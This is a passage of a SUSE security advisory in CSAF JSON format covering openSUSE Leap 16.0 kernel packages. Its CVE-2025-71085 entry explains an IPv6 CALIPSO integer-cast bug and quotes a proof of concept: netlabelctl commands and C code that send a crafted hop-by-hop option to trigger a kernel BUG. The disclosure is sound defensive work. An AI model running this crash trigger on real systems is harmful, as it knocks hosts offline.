"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "low"
}
],
"title": "CVE-2025-71084"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
